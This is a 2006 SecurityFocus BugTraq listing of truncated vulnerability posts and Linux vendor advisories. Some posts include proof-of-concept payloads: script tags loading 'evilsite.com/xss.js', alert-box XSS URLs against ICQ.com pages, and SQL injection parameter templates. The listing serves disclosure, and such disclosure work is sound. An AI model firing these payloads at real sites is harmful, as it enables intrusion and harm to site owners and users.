BugTraq Mode:
Chemical Directory - XSS 2006-06-08
luny youfucktard com
Chemical Directory v.unknown (doesn't say on website)

Homepage:

http://www.scriptsez.net/

Affected files:

dictionary.php

XSS Vulnerability via keyword variable:

http://www.example.com/dictionary.php?action=browse&keyword=e[SCRIPT SRC=http://evilsite.com/xss.js][/SCRIPT]

Babykatmedia.com scripts - vSCAL & vREAL - XSS Vulns 2006-06-07
luny youfucktard com
vSCAL and vREAL v1.0

Homepage:

http://www.babykatiemedia.com/

Affected files:

index.php

myslideshow.php

XSS Vulnerability via lid variable:

http://www.example.com/vscal/index.php?page=showlisting&lid=<SCRIPT%20SRC=evilsite.com//xss.js></SCRIPT>

XSS Vulnerability via myslideshow.php

Mafia Moblog Full Path Disclosure / SQL injection 2006-06-08
simo64 gmail com
Product : Mafia Moblog

WebSite : http://mafia.pearlabs.org

Version : 6 Full and Prior

Discovered By : Moroccan Security Research Team (Simo64)

IMPACT : Manipulation of data, System access

[+] Full Path Disclosure :

The problem is that it is possible to disclose the full path to 'big.php','upgr

[ MDKSA-2006:098 ] - Updated postgresql packages fixes SQL injection vulnerabilities. 2006-06-07
security mandriva com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDKSA-2006:098
http://www.mandriva.com/security/
____________________________________________________________________

PBL Guestbook v1.31 - XSS 2006-06-07
luny youfucktard com
PBLGuestbook v1.31

Homepage:

http://www.pixelatedbylev.com/

Affected files:

input boxes of the guestbook.

XSS Vulnerabilities PoC:

I noticed that common tags like <script> are filtered into the words "SCRIPT BLOCKED" in this guestbook, however img tags as well as others go unfiltered i

[ MDKSA-2006:097 ] - Updated MySQL packages fixes SQL injection vulnerability. 2006-06-07
security mandriva com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDKSA-2006:097
http://www.mandriva.com/security/
____________________________________________________________________

[USN-291-1] FreeType vulnerabilities 2006-06-08
Martin Pitt (martin pitt canonical com)
===========================================================
Ubuntu Security Notice USN-291-1 June 08, 2006
freetype vulnerabilities
CVE-2006-0747, CVE-2006-1861, CVE-2006-2493, CVE-2006-2661
===========================================================

A security issue affects the follo

[ MDKSA-2006:096 ] - Updated openldap packages fixes buffer overflow vulnerability. 2006-06-07
security mandriva com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDKSA-2006:096
http://www.mandriva.com/security/
____________________________________________________________________

[FLSA-2006:190884] Updated squirrelmail package fixes security issues 2006-06-06
Marc Deslauriers (marcdeslauriers videotron ca)
---------------------------------------------------------------------
Fedora Legacy Update Advisory

Synopsis: Updated squirrelmail package fixes security issues
Advisory ID: FLSA:190884
Issue date: 2006-06-06
Product: Red Hat Linux, Fedora Core
Keyword

[FLSA-2006:190941] Updated ipsec-tools package fixes security issue 2006-06-06
Marc Deslauriers (marcdeslauriers videotron ca)
---------------------------------------------------------------------
Fedora Legacy Update Advisory

Synopsis: Updated ipsec-tools package fixes security issue
Advisory ID: FLSA:190941
Issue date: 2006-06-06
Product: Fedora Core
Keywords: Bugfi

[FLSA-2006:189137-2] Updated firefox package fixes security issues 2006-06-06
Marc Deslauriers (marcdeslauriers videotron ca)
---------------------------------------------------------------------
Fedora Legacy Update Advisory

Synopsis: Updated firefox package fixes security issues
Advisory ID: FLSA:189137-2
Issue date: 2006-06-06
Product: Fedora Core
Keywords: Bugfix, Security
CVE

Calendar Express 2 SQL injection 2006-06-07
CrAzY CrAcKeR hotmail com
======================================

DISCOVERED BY: CrAzY CrAcKeR

Site:www.alshmokh.com

I want to thank my friend:-

nono225-mHOn-rageh-LoverHacker-Breeeeh

BoNy_m-Rootshill-LiNuX_rOOt-SauDiVirUs

======================================

Example:

/print/month.php?cid=&catid=[SQL]

/print/m

MiraksGalerie <= 2.62 Multiple Remote command execution 2006-06-07
Federico Fazzi (federico autistici org)
*/ Federico Fazzi, <federico (at) autistici (dot) org>
*/ MiraksGalerie <= 2.62 Remote command execution
*/ 07/06/2006 4:58

Bug:

pcltar.lib.php: line 34 - 35

---
if (!isset($g_pcltar_lib_dir))
$g_pcltar_lib_dir = "lib";
[etc..]
---

galimage.lib.php: line: 157 - 158

---
for($i=count($listconfigfile)-1;

[FLSA-2006:190777] Updated X.org packages fix security issue 2006-06-06
Marc Deslauriers (marcdeslauriers videotron ca)
---------------------------------------------------------------------
Fedora Legacy Update Advisory

Synopsis: Updated X.org packages fix security issue
Advisory ID: FLSA:190777
Issue date: 2006-06-06
Product: Fedora Core
Keywords: Bugfix
CVE N

[ GLSA 200606-01 ] Opera: Buffer overflow 2006-06-07
Sune Kloppenborg Jeppesen (jaervosz gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

Re: XSS in ICQ.com 2006-06-05
321_321 mail ru
http://www.icq.com/groups/atoz.php?letter=%3Cscript%3Ealert('find%20by%20a1i%20%20en')%3C/script%3E

[ GLSA 200606-04 ] Tor: Several vulnerabilities 2006-06-07
Sune Kloppenborg Jeppesen (jaervosz gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[FLSA-2006:189137-1] Updated mozilla packages fix security issues 2006-06-06
Marc Deslauriers (marcdeslauriers videotron ca)
---------------------------------------------------------------------
Fedora Legacy Update Advisory

Synopsis: Updated mozilla packages fix security issues
Advisory ID: FLSA:189137-1
Issue date: 2006-06-06
Product: Red Hat Linux, Fedora Core
Keywords: Bugfix,

[ GLSA 200606-05 ] Pound: HTTP request smuggling 2006-06-07
Sune Kloppenborg Jeppesen (jaervosz gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

Vice Stats 0.5b SQL injection 2006-06-07
CrAzY CrAcKeR hotmail com
===================================

DISCOVERED BY: CrAzY CrAcKeR

Site:www.alshmokh.com

I want to thank my friend:-

nono225-mHOn-rageh-LoverHacker-Breeeeh

BoNy_m-Rootshill-LiNuX_rOOt-SauDiVirUs

===================================

Example:-

/vs_resource.php?ID=[SQL]

================

rPSA-2006-0096-1 spamassassin 2006-06-07
Justin M. Forbes (jmforbes rpath com)
rPath Security Advisory: 2006-0096-1
Published: 2006-06-07
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
Remote Root Deterministic Unauthorized Access
Updated Versions:
spamassassin=/conary.rpath.com@rpl:devel//1/3.0.6-0.1-1

References:
http://www.cve.mitre.org/cg

[ GLSA 200606-03 ] Dia: Format string vulnerabilities 2006-06-07
Sune Kloppenborg Jeppesen (jaervosz gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

MyBB 1.1.2 New XSS 2006-06-06
o y 6 hotmail com
// MyBB 1.1.2 New XSS

File :- private.php

Ver. :- $do = $mybb->input['do'];

Line :- 260

Action :- Preview

HTTP Proof :-

/mybb/private.php?to=asda&subject=asd%3E&font=-&size=-&color=-&mode=advanced&message=sd&options%5Bsavecopy%5D=yes&options%5Breadreceipt%5D=yes&action=do_

[HV-LOW] Microsoft NetMeeting memory corruption (Brief) 2006-06-07
vuln hexview com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Microsoft NetMeeting memory corruption (Brief)

Classification:
===============
Level: [LOW]-med-high-crit
ID: HEXVIEW*2006*06*06*01
URL: http://www.hexview.com/docs/20060606-1.txt

Overview:
=========
Microsoft NetMeeting is an application that provid

Re: XSS in ICQ.com 2006-06-05
321_321 mail ru
http://www.icq.com/register/thanks.php?service=&uin=1%3Cscript%3Ealert(123);%3C/script%3E&newuser=1

ADVISORY - D-Link Wireless Access-Point 2006-06-07
news securityopensource org br
INTRUDERS TIGER TEAM SECURITY - SECURITY ADVISORY

http://www.intruders.com.br/

http://www.intruders.org.br/

ADVISORY/0206 - D-Link Wireless Access-Point (DWL-2100ap)

PRIORITY: HIGH

I - INTRUDERS:

----------------

Intruders Tiger Team Security is a project entailed with

S

Re: XSS in ICQ.com 2006-06-05
321_321 mail ru
http://www.icq.com/people/?searched=1&keyword2=&my_gender=[XSS]&match=[XSS]&age_group=[XSS]&home_cc=[XSS]

http://www.icq.com/groups/group_details.php?gid=12052128

http://www.icq.com/people/?searched=1&keyword2=&my_gender=[XSS]&match=[XSS]&age_group=[XSS]&home_cc=[XSS]

Copyright 2010, SecurityFocus